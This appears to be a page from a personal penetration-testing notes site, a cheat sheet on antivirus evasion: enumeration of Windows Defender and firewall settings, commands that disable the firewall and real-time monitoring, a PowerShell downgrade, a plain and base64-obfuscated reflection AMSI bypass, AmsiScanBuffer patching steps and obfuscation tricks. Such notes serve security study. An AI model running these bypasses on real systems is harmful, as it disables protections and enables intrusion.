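<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>The Real Hugo</title>
  <!--
    The two CDN scripts below are loaded without Subresource Integrity
    (no integrity="sha384-…" / crossorigin="anonymous"), and fuse.js is
    fetched with no version in the URL, so whatever the CDN serves next runs
    with this page's origin. Pin the versions and add SRI hashes.
  -->
  <script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
  <script src="/static/js/auto-complete.js"></script>
  <script src="/static/js/lunr.min.js"></script>
  <script src="/static/js/search.js"></script>
  <link rel="stylesheet" href="/static/stylesheet.css">
  <link rel="stylesheet" href="/static/auto-complete.css">
</head>
<body>
<!-- <center> is deprecated; it used to wrap <head> as well, which is invalid,
     so it now starts inside <body>. Centering .menu/.search-container from
     stylesheet.css would let it go entirely. -->
<center>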
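<!-- topmenu -->
<div class="menu">
  <a href="/" style="text-decoration:none">Husk</a>
</div>
<div class="search-container">
  <!-- The label holds only an icon, so the input carries its own accessible name. -->
  <label for="search-by"><i class="fas fa-search" aria-hidden="true"></i></label>
  <input id="search-by" data-search-input="" type="search" placeholder="Search..." autocomplete="off" aria-label="Search">
  <!-- TODO(a11y): this clear control is a <span>, so it is neither keyboard-reachable
       nor named; a <button type="button" aria-label="Clear search"> would fix both once
       search.js and stylesheet.css are checked for span-specific selectors. -->
  <span data-search-clear=""><i class="fas fa-times" aria-hidden="true"></i></span>
</div>
<div class="menu">
</div>
</center>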
< p > < / p >
< div class = "columns" >
<!-- Sidebar -->
< div class = "column column-1" >
< ul > < details id = enumeration ontoggle = "linkClick(this); return false;" > < summary > Enumeration< / summary > < ul > < details id = containers ontoggle = "linkClick(this); return false;" > < summary > Containers< / summary > < ul > < / ul > < / details > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/enumeration/docs/aws.html" > aws< / a > < / li > < li > < a href = "/enumeration/docs/cewl.html" > cewl< / a > < / li > < li > < a href = "/enumeration/docs/dns.html" > dns< / a > < / li > < li > < a href = "/enumeration/docs/docker_enumeration.html" > docker_enumeration< / a > < / li > < li > < a href = "/enumeration/docs/ffuf.html" > ffuf< / a > < / li > < li > < a href = "/enumeration/docs/gobuster.html" > gobuster< / a > < / li > < li > < a href = "/enumeration/docs/kerberoast.html" > kerberoast< / a > < / li > < li > < a href = "/enumeration/docs/kubectl.html" > kubectl< / a > < / li > < li > < a href = "/enumeration/docs/ldap.html" > ldap< / a > < / li > < li > < a href = "/enumeration/docs/linux_basics.html" > linux_basics< / a > < / li > < li > < a href = "/enumeration/docs/microk8s.html" > microk8s< / a > < / li > < li > < a href = "/enumeration/docs/nfs.html" > nfs< / a > < / li > < li > < a href = "/enumeration/docs/nikto.html" > nikto< / a > < / li > < li > < a href = "/enumeration/docs/nmap.html" > nmap< / a > < / li > < li > < a href = "/enumeration/docs/port_knocking.html" > port_knocking< / a > < / li > < li > < a href = "/enumeration/docs/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/docs/rsync.html" > rsync< / a > < / li > < li > < a href = "/enumeration/docs/rustscan.html" > rustscan< / a > < / li > < li > < a href = "/enumeration/docs/shodan.html" > shodan< / a > < / li > < details id = snmp ontoggle = "linkClick(this); return false;" > < summary > Snmp< / summary > < ul > < li > < a href = "/enumeration/docs/snmp/onesixtyone.html" > 
onesixtyone< / a > < / li > < li > < a href = "/enumeration/docs/snmp/snmpcheck.html" > snmpcheck< / a > < / li > < / ul > < / details > < li > < a href = "/enumeration/docs/websites.html" > websites< / a > < / li > < li > < a href = "/enumeration/docs/wfuzz.html" > wfuzz< / a > < / li > < li > < a href = "/enumeration/docs/wpscan.html" > wpscan< / a > < / li > < / ul > < / details > < details id = network_scanners ontoggle = "linkClick(this); return false;" > < summary > Network_scanners< / summary > < ul > < / ul > < / details > < details id = windows ontoggle = "linkClick(this); return false;" > < summary > Windows< / summary > < ul > < li > < a href = "/enumeration/windows/bloodhound.html" > bloodhound< / a > < / li > < li > < a href = "/enumeration/windows/event_log.html" > event_log< / a > < / li > < li > < a href = "/enumeration/windows/manual_enum.html" > manual_enum< / a > < / li > < li > < a href = "/enumeration/windows/powershell.html" > powershell< / a > < / li > < li > < a href = "/enumeration/windows/rpcclient.html" > rpcclient< / a > < / li > < li > < a href = "/enumeration/windows/sysinternals.html" > sysinternals< / a > < / li > < li > < a href = "/enumeration/windows/sysmon.html" > sysmon< / a > < / li > < li > < a href = "/enumeration/windows/vss.html" > vss< / a > < / li > < / ul > < / details > < / ul > < / details > < details id = exploit ontoggle = "linkClick(this); return false;" > < summary > Exploit< / summary > < ul > < details id = CPUs ontoggle = "linkClick(this); return false;" > < summary > CPUs< / summary > < ul > < li > < a href = "/exploit/CPUs/meltdown.html" > meltdown< / a > < / li > < / ul > < / details > < details id = binaries ontoggle = "linkClick(this); return false;" > < summary > Binaries< / summary > < ul > < li > < a href = "/exploit/binaries/Shellcode.html" > Shellcode< / a > < / li > < li > < a href = "/exploit/binaries/aslr.html" > aslr< / a > < / li > < details id = buffer_overflow ontoggle = "linkClick(this); return 
false;" > < summary > Buffer_overflow< / summary > < ul > < details id = docs ontoggle = "linkClick(this); return false;" > < summary > Docs< / summary > < ul > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64.html" > amd64< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/amd64_instructions.html" > amd64_instructions< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/buffer_overflow.html" > buffer_overflow< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html" > cut_stack_in_half< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html" > pwntools_specifics< / a > < / li > < li > < a href = "/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html" > ret_address_reuse< / a > < / li > < / ul > < / details > < li > < a href = "/exploit/binaries/buffer_overflow/ropping.html" > ropping< / a > < / li > < / ul > < / details > < details id = canary_bypass ontoggle = "l
< / ul >
< / div >
< div class = "column column-2" >
< span class = "body" >
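<style>
/* Token classes for the .codehilite code blocks below. */
pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */
</style>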
< div class = "column column-3" >
< ul >
< li > < a href = "#antivirus-evasion" > Antivirus Evasion< / a > < ul >
< li > < a href = "#enumeration" > Enumeration< / a > < / li >
< li > < a href = "#reset-options" > Reset Options< / a > < / li >
< li > < a href = "#anti-malware-secure-interface" > Anti Malware Secure Interface< / a > < ul >
< li > < a href = "#return-resultresponse-codes" > Return Result/Response Codes< / a > < / li >
< li > < a href = "#powershell-downgrade-attack" > PowerShell Downgrade Attack< / a > < / li >
< li > < a href = "#reflection-bypass" > Reflection Bypass< / a > < / li >
< li > < a href = "#amsi-scanbuffer-patch" > AMSI ScanBuffer patch< / a > < / li >
< li > < a href = "#other-bypasses-and-tools" > Other Bypasses and Tools< / a > < / li >
< li > < a href = "#validate" > Validate< / a > < / li >
< li > < a href = "#further-obfuscation" > Further Obfuscation< / a > < ul >
< li > < a href = "#type-obfuscation" > Type Obfuscation< / a > < / li >
< / ul >
< / li >
< li > < a href = "#automated-obfuscation" > Automated Obfuscation< / a > < ul >
< li > < a href = "#powershell" > Powershell< / a > < / li >
< li > < a href = "#other-obfuscation" > Other Obfuscation< / a > < / li >
< / ul >
< / li >
< / ul >
< / li >
< li > < a href = "#links" > Links< / a > < / li >
< / ul >
< / li >
< / ul >
< / div >
< h1 id = "antivirus-evasion" > Antivirus Evasion< / h1 >
< ul >
< li >
< p > Existing types< / p >
< ul >
< li > On-Disk evasion< / li >
< li > In-Memory evasion< / li >
< / ul >
< / li >
< li >
< p > Detection Methods< / p >
< ul >
< li > Static Detection -- Hash or String/Byte Matching < / li >
< li > Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime< / li >
< li > Heuristic / Behavioural Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software< / li >
< / ul >
< / li >
< li >
< p > Additional Features< / p >
< ul >
< li > Unpacker -- decrypting and decompressing< / li >
< li > PE header parser -- portable executable headers are parsed< / li >
< li > Emulation -- analysis in an emulated env< / li >
< / ul >
< / li >
< / ul >
< h2 id = "enumeration" > Enumeration< / h2 >
< div class = "codehilite" > < pre > < span > < / span > < code > wmic /namespace:< span class = "se" > \\< / span > root< span class = "se" > \s< / span > ecuritycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > Get-Service WinDefend
Get-MpComputerStatus < span class = "p" > |< / span > < span class = "k" > select< / span > RealTimeProtectionEnabled
< / code > < / pre > < / div >
< ul >
< li > Check firewall< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > Get-NetFirewallProfile < span class = "p" > |< / span > Format-Table Name, Enabled
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > Get-NetFirewallRule < span class = "p" > |< / span > < span class = "k" > select< / span > DisplayName, Enabled, Description
< / code > < / pre > < / div >
< ul >
< li > Check inbound port availability< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > Test-NetConnection -ComputerName < span class = "m" > 127< / span > .0.0.1 -Port < span class = "m" > 80< / span >
< / code > < / pre > < / div >
< ul >
< li > Check Windows Defender and its active rules< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > powershell -c < span class = "s2" > " Get-MpPreference" < / span >
powershell -c < span class = "s2" > " Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id< / span >
< / code > < / pre > < / div >
< ul >
< li > Check tamper protection, and < a href = "https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1" > bypass< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > reg query < span class = "s2" > " HKLM\Software\Microsoft\Windows Defender\Features" < / span > /v TamperProtection
< / code > < / pre > < / div >
< h2 id = "reset-options" > Reset Options< / h2 >
< div class = "codehilite" > < pre > < span > < / span > < code > Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
< / code > < / pre > < / div >
< h2 id = "anti-malware-secure-interface" > Anti Malware Secure Interface< / h2 >
< ul >
< li > PowerShell .NET runtime detection measure of Windows. Scans code before it is executed.< / li >
< li > https://docs.microsoft.com/en-us/windows/win32/amsi/< / li >
< li > https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions< / li >
< li > https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream< / li >
< li > Integrated inside components< ul >
< li > User Account Control (UAC)< / li >
< li > Powershell< / li >
< li > Windows Script Host (wscript, cscript)< / li >
< li > JavaScript and VBScript< / li >
< li > VBA macros< / li >
< / ul >
< / li >
< li >
< p > < code > System.Management.Automation.dll< / code > < / p >
< / li >
< li >
< p > Flow< / p >
< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span > < span class = "n" > Win32< / span > < span class = "w" > < / span > < span class = "n" > API< / span > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span > < span class = "n" > COM< / span > < span class = "w" > < / span > < span class = "n" > API< / span > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span > < span class = "n" > AV< / span > < span class = "w" > < / span > < span class = "n" > Provider< / span > < span class = "w" > < / span > < span class = "o" > |< / span > < span class = "w" > < / span >
< span class = "n" > Interpreter< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > AMSIScanBuffer< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > AMSIScanString< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > IAntiMalware< / span > < span class = "o" > ::< / span > < span class = "kr" > Scan< / span > < span class = "p" > ()< / span > < span class = "w" > < / span > < span class = "o" > --> < / span > < span class = "w" > < / span > < span class = "n" > IAntiMalwareProvider< / span > < span class = "o" > ::< / span > < span class = "kr" > Scan< / span > < span class = "p" > ()< / span > < span class = "w" > < / span >
< / code > < / pre > < / div >
< h3 id = "return-resultresponse-codes" > Return Result/Response Codes< / h3 >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "n" > AMSI_RESULT_CLEAN< / span > < span class = "o" > =< / span > < span class = "mi" > 0< / span >
< span class = "n" > AMSI_RESULT_NOT_DETECTED< / span > < span class = "o" > =< / span > < span class = "mi" > 1< / span >
< span class = "n" > AMSI_RESULT_BLOCKED_BY_ADMIN_START< / span > < span class = "o" > =< / span > < span class = "mi" > 16384< / span >
< span class = "n" > AMSI_RESULT_BLOCKED_BY_ADMIN_END< / span > < span class = "o" > =< / span > < span class = "mi" > 20479< / span >
< span class = "n" > AMSI_RESULT_DETECTED< / span > < span class = "o" > =< / span > < span class = "mi" > 32768< / span >
< / code > < / pre > < / div >
< h3 id = "powershell-downgrade-attack" > PowerShell Downgrade Attack< / h3 >
< ul >
< li > Downgrade Powershell version to 2.0, where no AMSI is implemented< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > PowerShell -Version < span class = "m" > 2< / span >
< / code > < / pre > < / div >
< ul >
< li > < a href = "https://github.com/trustedsec/unicorn" > Unicorn< / a > leverages this< / li >
< / ul >
< h3 id = "reflection-bypass" > Reflection Bypass< / h3 >
< ul >
< li > Varying string concatenation and camelCasing variations of the following string by Matt Graeber< / li >
< li > < a href = "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/" > Matt Graeber's Reflection< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > Ref< span class = "o" > ]< / span > .Assembly.GetType< span class = "o" > (< / span > < span class = "s1" > ' System.Management.Automation.AmsiUtils' < / span > < span class = "o" > )< / span > .GetField< span class = "o" > (< / span > < span class = "s1" > ' amsiInitFailed' < / span > ,< span class = "s1" > ' NonPublic,Static' < / span > < span class = "o" > )< / span > .SetValue< span class = "o" > (< / span > < span class = "nv" > $null< / span > ,< span class = "nv" > $true< / span > < span class = "o" > )< / span >
< / code > < / pre > < / div >
< p > or an obfuscated version< / p >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > Ref< span class = "o" > ]< / span > .Assembly.GetType< span class = "o" > (< / span > < span class = "s1" > ' System.Management.Automation.' < / span > +< span class = "k" > $(< / span > < span class = "o" > [< / span > Text.Encoding< span class = "o" > ]< / span > ::Unicode.GetString< span class = "o" > ([< / span > Convert< span class = "o" > ]< / span > ::FromBase64String< span class = "o" > (< / span > < span class = "s1" > ' QQBtAHMAaQBVAHQAaQBsAHMA' < / span > < span class = "k" > )< / span > < span class = "o" > )))< / span > .GetField< span class = "o" > (< / span > < span class = "k" > $(< / span > < span class = "o" > [< / span > Text.Encoding< span class = "o" > ]< / span > ::Unicode.GetString< span class = "o" > ([< / span > Convert< span class = "o" > ]< / span > ::FromBase64String< span class = "o" > (< / span > < span class = "s1" > ' YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==' < / span > < span class = "k" > )< / span > < span class = "o" > ))< / span > ,< span class = "s1" > ' NonPublic,Static' < / span > < span class = "o" > )< / span > .SetValue< span class = "o" > (< / span > < span class = "nv" > $null< / span > ,< span class = "nv" > $true< / span > < span class = "o" > )< / span >
Remove-Item -Path < span class = "s2" > " HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" < / span > -Recurse
Set-MpPreference -DisableRealtimeMonitoring < span class = "nv" > $true< / span >
< / code > < / pre > < / div >
< h3 id = "amsi-scanbuffer-patch" > AMSI ScanBuffer patch< / h3 >
< ul >
< li > Patching < code > amsi.dll< / code > , which is loaded at Powershell startup< / li >
< li >
< p > AMSI ScanBuffer is delivered to < code > amsi.dll< / code > < / p >
< / li >
< li >
< p > Get handle of < code > amsi.dll< / code > < / p >
< / li >
< li > Get process address of AmsiScanBuffer< / li >
< li > Modify mem protection of AmsiScanBuffer< / li >
< li >
< p > Write opcode to AMSIScanBuffer< / p >
< / li >
< li >
< p > < a href = "https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py" > BC-Security's AMSI bypass< / a > < / p >
< / li >
< li > < a href = "https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs" > RastaMouse's AMSI bypass< / a > < / li >
< / ul >
< h3 id = "other-bypasses-and-tools" > Other Bypasses and Tools< / h3 >
< ul >
< li >
< p > < a href = "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git" > S3cur3Th1sSh1t< / a > < / p >
< / li >
< li >
< p > < a href = "http://amsi.fail/" > amsifail< / a > generates obfuscated snippets< / p >
< / li >
< / ul >
< h3 id = "validate" > Validate< / h3 >
< ul >
< li > < a href = "https://github.com/RythmStick/AMSITrigger" > AMSITrigger< / a > identifies strings which trigger the AMSI functions< / li >
< li > Validate Obfuscation and check which strings trigger AMSI< / li >
< li > < a href = "https://github.com/RythmStick/AMSITrigger" > AMSITrigger Repo< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > .< span class = "se" > \\< / span > AMSITrigger.exe -u < URL> -f < span class = "m" > 1< / span >
< / code > < / pre > < / div >
< p > or< / p >
< div class = "codehilite" > < pre > < span > < / span > < code > .< span class = "se" > \\< / span > AMSITrigger.exe -i < file> -f < span class = "m" > 1< / span >
< / code > < / pre > < / div >
< h3 id = "further-obfuscation" > Further Obfuscation< / h3 >
< ul >
< li > String concatenation< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "nv" > $OBF< / span > < span class = "o" > =< / span > < span class = "s1" > ' Ob' < / span > + < span class = "s1" > ' fu' < / span > + < span class = "s1" > ' s' < / span > +< span class = "s1" > ' cation' < / span >
< / code > < / pre > < / div >
< ul >
< li > < code > Concatenate - ('co'+'ffe'+'e')< / code > < / li >
< li > < code > Reorder - ('{1}{0}'-f'ffee','co')< / code > < / li >
< li > < code > Whitespace - ( 'co' +'fee' + 'e')< / code > < / li >
< / ul >
< h4 id = "type-obfuscation" > Type Obfuscation< / h4 >
< ul >
< li > .NET has type accelerators as aliases for types to shorten them and break the signature.< / li >
< li > < a href = "https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell" > idera< / a > < / li >
< li > < a href = "https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html" > 0x00-0x00< / a > < / li >
< li >
< p > < a href = "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1" > Documentation at microsoft< / a > < / p >
< / li >
< li >
< p > Example< / p >
< ul >
< li > Without< / li >
< / ul >
< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > system.runtime.interopservices.marshal< span class = "o" > ]< / span > ::copy< span class = "o" > (< / span > < span class = "nv" > $buf< / span > , < span class = "m" > 0< / span > , < span class = "nv" > $BufferAddress< / span > , < span class = "m" > 6< / span > < span class = "o" > )< / span > < span class = "p" > ;< / span >
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > * With
< / code > < / pre > < / div >
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "o" > [< / span > dorkstork< span class = "o" > ]< / span > ::copy< span class = "o" > (< / span > < span class = "nv" > $buf< / span > , < span class = "m" > 0< / span > , < span class = "nv" > $BufferAddress< / span > , < span class = "m" > 6< / span > < span class = "o" > )< / span > < span class = "p" > ;< / span >
< / code > < / pre > < / div >
< h3 id = "automated-obfuscation" > Automated Obfuscation< / h3 >
< h4 id = "powershell" > Powershell< / h4 >
< ul >
< li > < a href = "https://github.com/danielbohannon/Invoke-Obfuscation" > Invoke-Obfuscation< / a > < / li >
< li > < a href = "https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide" > Daniel's guide to Invoke-Obfuscation< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > Invoke-Obfuscation -ScriptBlock < span class = "o" > {< / span > < span class = "s1" > ' Payload Here' < / span > < span class = "o" > }< / span > -Command < span class = "s1" > ' Token\\String\\1,2,\\Whitespace\\1' < / span > -Quiet -NoExit
< / code > < / pre > < / div >
< ul >
< li > < a href = "https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation" > < strong > 8191 character limit< / strong > < / a > of command prompt must not be exceeded.< / li >
< / ul >
< h4 id = "other-obfuscation" > Other Obfuscation< / h4 >
< ul >
< li > Pinpoint bytes that will be flagged with < a href = "https://github.com/rasta-mouse/ThreatCheck" > ThreatCheck< / a > < ul >
< li > Has to be built via VS. Will output a DLL, an executable and an XML file.< / li >
< li > < code > ThreatCheck.exe -f < file> < / code > < / li >
< / ul >
< / li >
< li > < a href = "https://github.com/matterpreter/DefenderCheck" > DefenderCheck< / a > < / li >
< / ul >
< h2 id = "links" > Links< / h2 >
< ul >
< li > < a href = "https://cmnatic.co.uk/" > cmnatic< / a > < / li >
< li > < a href = "https://resources.cmnatic.co.uk/Presentations/Dissertation/" > cmnatic's diss< / a > < / li >
< li > < a href = "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/" > s3cur3th1ssh1t< / a > < / li >
< li > < a href = "https://amsi.fail/" > amsi.fail< / a > < / li >
< / ul >
< / span >
< / div >
< / div >
< div id = "footer" >
< p > < / p >
< center >
© Stefan Friese
< / center >
< / div >
< script >
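function linkClick(obj) {
  // Persists the open/closed state of one sidebar <details> element in
  // sessionStorage so the navigation tree survives page loads within the tab.
  //
  // Invoked from the inline ontoggle="linkClick(this); …" attributes on the
  // sidebar <details> elements; `obj` is that element and its id is the key.
  // (Inline handlers keep this page from running under a CSP that omits
  // 'unsafe-inline'; binding with addEventListener('toggle', …) would remove
  // that dependency.)
  //
  // Contract: an open element is stored as the string "open"; a closed
  // element is recorded by deleting its key. Nothing else is ever written.
  if (!obj || !obj.id) {
    // Without an id there is nothing to key on, and an empty key would later
    // make the restore loop look up a non-existent element.
    return;
  }
  if (obj.open) {
    // setItem overwrites any previous value, so no separate removal is needed.
    sessionStorage.setItem(obj.id, "open");
  } else {
    sessionStorage.removeItem(obj.id);
  }
}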
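// Re-opens every sidebar <details> whose id linkClick() recorded as "open"
// earlier in this tab. Runs once at page load, after the sidebar markup above
// has been parsed.
function restoreOpenDetails() {
  if (typeof sessionStorage === "undefined" || typeof document === "undefined") {
    return; // no storage or no DOM: nothing to restore
  }
  for (const key of Object.keys(sessionStorage)) {
    // sessionStorage is shared with the other scripts on this origin, so a
    // key is acted on only when it carries the marker linkClick() writes and
    // names an element that exists. Previously a key with no matching element
    // threw a TypeError here and aborted the whole loop.
    if (sessionStorage.getItem(key) !== "open") {
      continue;
    }
    const details = document.getElementById(key);
    if (details) {
      details.open = true;
    }
  }
}
restoreOpenDetails();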
< / script >
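<!--
  MathJax 2.x reads inline text/x-mathjax-config blocks when it starts, and its
  documentation requires them to precede the loader script, so the config now
  comes first (it previously followed the async loader, racing its load).
  The loader is fetched from a CDN without Subresource Integrity; add
  integrity="…" and crossorigin="anonymous" for the pinned 2.7.1 asset.
-->
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  config: ["MMLorHTML.js"],
  jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
  extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>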
< / body >
< / html >